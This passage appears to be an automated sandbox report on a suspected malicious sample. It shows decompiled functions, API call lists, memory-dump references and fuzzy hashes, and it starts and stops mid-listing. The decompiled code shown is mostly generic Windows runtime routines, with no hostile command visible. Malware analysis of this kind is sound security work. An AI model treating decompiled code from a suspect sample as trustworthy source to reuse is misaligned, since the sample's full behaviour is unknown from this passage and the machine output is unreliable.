                                                                                                                                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                            • String ID: (I$'$I
                                                                                                                                                                                                                            • API String ID: 730355536-3463978989
                                                                                                                                                                                                                            • Opcode ID: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                                                            • Instruction ID: dfc13510ffc652cdc4745fa131ecd9d2d70f716ade9f6bddb0b8d8da957d249b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201AD70204240AEE716EB6B9816B153BD4D76970CF85807FF000A77F2E6BC6840CA1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E00474948(char __eax, void* __ebx, void* __ecx, char __edx) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				signed short* _v36;
                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                                                                            				char _v60;
                                                                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                            				void* _t93;
                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                            				intOrPtr _t111;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t109 = _t110;
                                                                                                                                                                                                                            				_t111 = _t110 + 0xffffffc4;
                                                                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                                                                            				_t93 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				_push(_t109);
                                                                                                                                                                                                                            				_push(0x474ab3);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t111;
                                                                                                                                                                                                                            				E004049C0(__ecx);
                                                                                                                                                                                                                            				_v32 = 0xff;
                                                                                                                                                                                                                            				_push( &_v28);
                                                                                                                                                                                                                            				_t52 = E00404ED8( &_v8);
                                                                                                                                                                                                                            				_push(_t52); // executed
                                                                                                                                                                                                                            				L004072A8(); // executed
                                                                                                                                                                                                                            				_v24 = _t52;
                                                                                                                                                                                                                            				if(_v24 == 0) {
                                                                                                                                                                                                                            					_pop(_t101);
                                                                                                                                                                                                                            					 *[fs:eax] = _t101;
                                                                                                                                                                                                                            					_push(0x474aba);
                                                                                                                                                                                                                            					E004049C0( &_v40);
                                                                                                                                                                                                                            					return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v16 = E0040275C(_v24);
                                                                                                                                                                                                                            					_push(_t109);
                                                                                                                                                                                                                            					_push(0x474a89);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t111;
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					_push(_v24);
                                                                                                                                                                                                                            					_push(_v28);
                                                                                                                                                                                                                            					_t65 = E00404ED8( &_v8);
                                                                                                                                                                                                                            					_push(_t65); // executed
                                                                                                                                                                                                                            					L004072A0(); // executed
                                                                                                                                                                                                                            					if(_t65 != 0) {
                                                                                                                                                                                                                            						_push( &_v32);
                                                                                                                                                                                                                            						_push( &_v36);
                                                                                                                                                                                                                            						_push("\\VarFileInfo\\Translation");
                                                                                                                                                                                                                            						_t71 = _v16;
                                                                                                                                                                                                                            						_push(_t71);
                                                                                                                                                                                                                            						L004072B0();
                                                                                                                                                                                                                            						if(_t71 != 0) {
                                                                                                                                                                                                                            							_v64 =  *_v36 & 0x0000ffff;
                                                                                                                                                                                                                            							_v60 = 0;
                                                                                                                                                                                                                            							_v56 = E004079DC( *_v36) & 0x0000ffff;
                                                                                                                                                                                                                            							_v52 = 0;
                                                                                                                                                                                                                            							_v48 = _v12;
                                                                                                                                                                                                                            							_v44 = 0xb;
                                                                                                                                                                                                                            							E0040A664("\\StringFileInfo\\%0.4x%0.4x\\%s", 2,  &_v64,  &_v40);
                                                                                                                                                                                                                            							E00404A58( &_v12, _v40);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_push( &_v32);
                                                                                                                                                                                                                            						_push( &_v20);
                                                                                                                                                                                                                            						_push(E00404ED8( &_v12));
                                                                                                                                                                                                                            						_t76 = _v16;
                                                                                                                                                                                                                            						_push(_t76);
                                                                                                                                                                                                                            						L004072B0();
                                                                                                                                                                                                                            						if(_t76 != 0) {
                                                                                                                                                                                                                            							E0040A174(_v20, _t93);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t103);
                                                                                                                                                                                                                            					 *[fs:eax] = _t103;
                                                                                                                                                                                                                            					_push(0x474a90);
                                                                                                                                                                                                                            					return E0040277C(_v16);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73AC14E0.VERSION(00000000,?,00000000,00474AB3), ref: 00474995
                                                                                                                                                                                                                            • 73AC14C0.VERSION(00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749D5
                                                                                                                                                                                                                            • 73AC1500.VERSION(?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749F3
                                                                                                                                                                                                                            • 73AC1500.VERSION(?,00000000,?,000000FF,?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000), ref: 00474A5D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • \VarFileInfo\Translation, xrefs: 004749EA
                                                                                                                                                                                                                            • \StringFileInfo\%0.4x%0.4x\%s, xrefs: 00474A33
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: C1500
                                                                                                                                                                                                                            • String ID: \StringFileInfo\%0.4x%0.4x\%s$\VarFileInfo\Translation
                                                                                                                                                                                                                            • API String ID: 1255762788-999260334
                                                                                                                                                                                                                            • Opcode ID: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                                                                                                                                                                                            • Instruction ID: 32f586d465f208a33ace568febe6e2dc1f3a77b47997a46495fde34554132249
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7941ECB1D04209AFDB01EBE5D981AEFB7F8AB48304F50447AF514F3291D738AE048B69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E004587A4(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				struct tagLOGFONTA _v65;
                                                                                                                                                                                                                            				struct tagLOGFONTA _v185;
                                                                                                                                                                                                                            				struct tagLOGFONTA _v245;
                                                                                                                                                                                                                            				void _v405;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                            				struct HFONT__* _t41;
                                                                                                                                                                                                                            				struct HFONT__* _t45;
                                                                                                                                                                                                                            				struct HFONT__* _t49;
                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t72 = __edi;
                                                                                                                                                                                                                            				_t74 = _t75;
                                                                                                                                                                                                                            				_t76 = _t75 + 0xfffffe6c;
                                                                                                                                                                                                                            				_t57 = __eax;
                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                            				if( *0x49ebb8 != 0) {
                                                                                                                                                                                                                            					_t54 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            					_v5 =  *((intOrPtr*)(_t54 + 0x88));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_t74);
                                                                                                                                                                                                                            				_push(0x4588e9);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t76;
                                                                                                                                                                                                                            				if( *0x49ebb8 != 0) {
                                                                                                                                                                                                                            					_t52 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            					E0045AD24(_t52, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                                                                                                                                                                                                            					_t23 = GetStockObject(0xd);
                                                                                                                                                                                                                            					_t7 = _t57 + 0x84; // 0x38004010
                                                                                                                                                                                                                            					E00424FCC( *_t7, _t23, _t72);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t49 = CreateFontIndirectA( &_v65); // executed
                                                                                                                                                                                                                            					_t6 = _t57 + 0x84; // 0x38004010
                                                                                                                                                                                                                            					E00424FCC( *_t6, _t49, _t72);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v405 = 0x154;
                                                                                                                                                                                                                            				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
                                                                                                                                                                                                                            				if(_t27 == 0) {
                                                                                                                                                                                                                            					_t14 = _t57 + 0x80; // 0x94000000
                                                                                                                                                                                                                            					E004250B0( *_t14, 8);
                                                                                                                                                                                                                            					_t30 = GetStockObject(0xd);
                                                                                                                                                                                                                            					_t15 = _t57 + 0x88; // 0x90000000
                                                                                                                                                                                                                            					E00424FCC( *_t15, _t30, _t72);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t41 = CreateFontIndirectA( &_v185);
                                                                                                                                                                                                                            					_t11 = _t57 + 0x80; // 0x94000000
                                                                                                                                                                                                                            					E00424FCC( *_t11, _t41, _t72);
                                                                                                                                                                                                                            					_t45 = CreateFontIndirectA( &_v245);
                                                                                                                                                                                                                            					_t13 = _t57 + 0x88; // 0x90000000
                                                                                                                                                                                                                            					E00424FCC( *_t13, _t45, _t72);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t16 = _t57 + 0x80; // 0x94000000
                                                                                                                                                                                                                            				E00424E10( *_t16, 0xff000017);
                                                                                                                                                                                                                            				_t17 = _t57 + 0x88; // 0x90000000
                                                                                                                                                                                                                            				E00424E10( *_t17, 0xff000007);
                                                                                                                                                                                                                            				 *[fs:eax] = 0xff000007;
                                                                                                                                                                                                                            				_push(0x4588f0);
                                                                                                                                                                                                                            				if( *0x49ebb8 != 0) {
                                                                                                                                                                                                                            					_t38 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            					return E0045AD24(_t38, _v5);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004587F8
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00458805
                                                                                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 0045881B
                                                                                                                                                                                                                              • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00458844
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00458854
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 0045886D
                                                                                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 00458893
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2891467149-0
                                                                                                                                                                                                                            • Opcode ID: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                                                                                                                                                                                            • Instruction ID: c8c9ae32e1ca622756d665ee7f261621c5687007f21876862268219cdbc985ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E318330B042449FE750FBA9DC42B9973A4EB44305F9440BABD08EB2D7DE78A949C729
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00437D70(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				intOrPtr* _t43;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t43 =  &_v8;
                                                                                                                                                                                                                            				_t20 =  *0x49bc20; // 0x0
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                                                                                                                                                                                                                            				_t21 =  *0x49bc20; // 0x0
                                                                                                                                                                                                                            				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                                                                                                                                                                                                                            				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                                                                                                                                                                                                            					SetWindowLongA(_a4, 0xfffffff4, _a4);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t27 =  *0x49bc20; // 0x0
                                                                                                                                                                                                                            				SetPropA(_a4,  *0x49eb26 & 0x0000ffff, _t27);
                                                                                                                                                                                                                            				_t31 =  *0x49bc20; // 0x0
                                                                                                                                                                                                                            				SetPropA(_a4,  *0x49eb24 & 0x0000ffff, _t31);
                                                                                                                                                                                                                            				_t35 =  *0x49bc20; // 0x0
                                                                                                                                                                                                                            				 *0x49bc20 = 0; // executed
                                                                                                                                                                                                                            				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                                                                                                                                                                                                                            				return  *_t43;
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 00437D98
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00437DA3
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00437DB5
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 00437DC8
                                                                                                                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 00437DDF
                                                                                                                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 00437DF6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LongWindow$Prop
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3887896539-0
                                                                                                                                                                                                                            • Opcode ID: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                                                                                                                                                                                            • Instruction ID: b5f16ed505960de4fc23b1fb6768328cc78d5017c86fd9e1eb6bf423726d3339
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0111CCB5504208BFDB10DF9DDD84EAA37E8EB1C354F10462AF914DB2A1DB34E9409BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E00457FC8(char __edx, void* __edi) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                            				char _t64;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t74 = __edi;
                                                                                                                                                                                                                            				_t64 = __edx;
                                                                                                                                                                                                                            				if(__edx != 0) {
                                                                                                                                                                                                                            					_t77 = _t77 + 0xfffffff0;
                                                                                                                                                                                                                            					_t25 = E00403F10(_t25, _t76);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v5 = _t64;
                                                                                                                                                                                                                            				_t62 = _t25;
                                                                                                                                                                                                                            				E00421B3C(_t63, 0);
                                                                                                                                                                                                                            				_t28 =  *0x49d878; // 0x49b510
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t28 + 4)) = _t62;
                                                                                                                                                                                                                            				 *_t28 = 0x45836c;
                                                                                                                                                                                                                            				_t29 =  *0x49d888; // 0x49b518
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t29 + 4)) = _t62;
                                                                                                                                                                                                                            				 *_t29 = 0x458378;
                                                                                                                                                                                                                            				E00458384(_t62);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x4c)) = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x50)) = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x54)) = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x58)) = E00403BBC(1);
                                                                                                                                                                                                                            				_t42 = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_t75 = _t42;
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				_t11 = _t62 + 0x58; // 0x45122c6e
                                                                                                                                                                                                                            				_t45 =  *0x49dae4; // 0x49e91c
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_t45))(0, 0, E004547A0,  *_t11, 0, _t75, _t75, 0x5a, 0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x84)) = E00424C3C(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x88)) = E00424C3C(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x80)) = E00424C3C(1);
                                                                                                                                                                                                                            				E004587A4(_t62, _t62, _t63, _t74);
                                                                                                                                                                                                                            				_t15 = _t62 + 0x84; // 0x38004010
                                                                                                                                                                                                                            				_t56 =  *_t15;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t56 + 8)) = 0x458680;
                                                                                                                                                                                                                            				_t18 = _t62 + 0x88; // 0x90000000
                                                                                                                                                                                                                            				_t57 =  *_t18;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t57 + 8)) = 0x458680;
                                                                                                                                                                                                                            				_t21 = _t62 + 0x80; // 0x94000000
                                                                                                                                                                                                                            				_t58 =  *_t21;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t58 + 8)) = 0x458680;
                                                                                                                                                                                                                            				_t59 = _t62;
                                                                                                                                                                                                                            				if(_v5 != 0) {
                                                                                                                                                                                                                            					E00403F68(_t59);
                                                                                                                                                                                                                            					_pop( *[fs:0x0]);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t62;
                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardLayout.USER32 ref: 0045800D
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?), ref: 00458077
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380KeyboardLayout
                                                                                                                                                                                                                            • String ID: 5B
                                                                                                                                                                                                                            • API String ID: 648844651-3738334870
                                                                                                                                                                                                                            • Opcode ID: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                                                                                                                                                                                            • Instruction ID: 7c78f0e896318b154a236a51f14d482704da40fbffa7cbfd833c934430294294
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2331EA706052049FD740EF2AD8C1B497BE5FB05319F4480BEEC08DF367DA7AA9498B59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E004348A8(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				long _t27;
                                                                                                                                                                                                                            				long _t34;
                                                                                                                                                                                                                            				int _t42;
                                                                                                                                                                                                                            				int _t43;
                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t54 = __edx;
                                                                                                                                                                                                                            				_t57 = __eax;
                                                                                                                                                                                                                            				_push(_t60);
                                                                                                                                                                                                                            				_push(0x434993);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t60 + 0xfffffff8;
                                                                                                                                                                                                                            				if(__edx >= 0) {
                                                                                                                                                                                                                            					_t42 = SendMessageA(E00441704( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
                                                                                                                                                                                                                            					if(_t42 < 0) {
                                                                                                                                                                                                                            						_t43 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
                                                                                                                                                                                                                            						if(_t43 >= 0) {
                                                                                                                                                                                                                            							_t27 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
                                                                                                                                                                                                                            							if(_t27 != 0) {
